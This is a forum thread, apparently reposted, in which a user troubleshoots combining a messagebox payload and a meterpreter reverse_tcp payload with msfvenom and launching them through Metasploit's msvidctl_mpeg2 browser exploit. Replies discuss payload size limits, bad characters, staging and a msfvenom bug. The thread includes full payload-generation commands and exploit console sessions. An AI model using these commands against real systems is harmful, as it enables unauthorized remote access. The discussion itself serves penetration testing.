Metasploit generic/custom payload with a multipayload

Published 2024-12-12 14:15:38 · 2762 characters · 0 views · 0 comments


I've been playing around with the newer MSF4 (Framework: 4.1.0-release.13988, Console: 4.1.0-release.13581) multipayload support using msfvenom and the custom/generic payload, but there seems to be a dearth of information on what the payload supports in terms of encodings and compatibility.

Basically I'm looking at how a server-side service can be shut down, then have the meterpreter listen on its no-longer-bound port. (The exploit would come in on another port.)

Essentially I created a multipayload using msfvenom with the msgbox and Meterpreter back-to-back, as an exe, raw, and .rb. I've tried leaving the encoding setting alone, and setting it to None. (Note that the custom/generic payload .rb source says something about only allowing None encoding.)

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw

I also tried it with EXITFUNC set to "none":

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none> test\msgterp.raw

Then I need to write the raw multipayload to something that the generic/custom payload can use: (note I've tried writing to raw, exe, .rb formats)

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw

Finally it's time to try the multipayload out with generic/custom: (note that I reloaded the exploit each time before trying to set and exploit)

msf > use exploit/windows/browser/msvidctl_mpeg2
msf  exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom
PAYLOAD => generic/custom

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw
PAYLOADSTR => c:\metasploit\test\msf.raw
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe
PAYLOADSTR => c:\metasploit\test\msf.exe
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw
PAYLOADFILE => c:\metasploit\test\msf.raw
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe
PAYLOADFILE => c:\metasploit\test\msf.exe
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

So I found an explanation on what the "No encoders encoded..." error is supposed to mean. (http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions) This is where stager payloads come in I suppose.

Is the cause of the error the windows/msgbox payload because it's not staged? Or is it that multipayloads aren't staged? If it's the latter, then I can't see how multipayloads would ever work unless they were staged. Combining 2 payloads would likely be larger than a single payload.

Can someone please at least explain the encodings and formats that should be compatible with the generic/payload payload so I can rule that out? I've only found a couple of references to multipayload support.

Thanks in advance! I promise to reply with how I got this working once I do.


Comments (2)

薔薇婲 2024-12-19 14:15:39


I think it would be helpful for you to understand some exploit dynamics and classical memory corruption bug exploit strategies before diving into something like this.

May I suggest The Art of Software Security Assessment or Shellcoder's Handbook

That said, here is what is happening. When you 'cave' out memory in a buffer overflow, you have a limited amount of space available for your exploit before you hit the stored stack frame and instruction pointer. The MPEG2 browser bug (which you are trying to exploit) allocates 1024 bytes on the stack, which is thusly the limit of your payload; as well, it is terminated by the standard series (\x00\x09\x0a\x0d, that's null char, stop, carriage return, and line feed respectively), which further limits you to any shellcode which is not written with this in mind.

Metasploit, however, is pretty smart: it can usually mock out some instructions with 'safe' and exploitable instructions; however, this is not always possible due to inconsistencies in instruction sets, stack explosions, etc. When msfvenom's payload is run against the generators, nothing can 'work' and Metasploit throws your error.

As you have guessed, this means you need to stage your shellcode (err, I meant payload). A good staging payload typically can be mangled and spread across multiple memory locations and is still resilient (or repetitive) enough to automatically put itself back together using a technique called egg hunting. If I were in your shoes I would use the generic reverse bind windows/meterpreter/reverse_tcp, however, because I don't believe that this specific exploit mixes ordinals or anything funky like that.

Best of Luck

小…楫夜泊 2024-12-19 14:15:39


Sorry about the late answer.

There was a bug in MSF 4.1 regarding msfvenom, not the generic/custom payload. The payloads I generated were definitely smaller than the 1024 bytes allowable. Here's a thread dedicated to it, where HDM himself suggests it's a bug:

https://community.rapid7.com/thread/1332

And the bug case that was logged along with the fix for msfvenom:

http://dev.metasploit.com/redmine/issues/4714

I just don't think anyone was using the multi-payload support. Don't be confused by my previous clunky use of msfvenom. I was desperate by the time I posted this question, so I included everything I thought the problem might be without getting into writing shellcode. I was on the verge of trying to learn how to write a 2-in-1 shellcode test when HDM admitted this was a bug, and I decided to go another route. (I grabbed the MSF Pro Trial and set up a VPN pivot to solve my multi-hop test scenario.)

Thanks for the response.
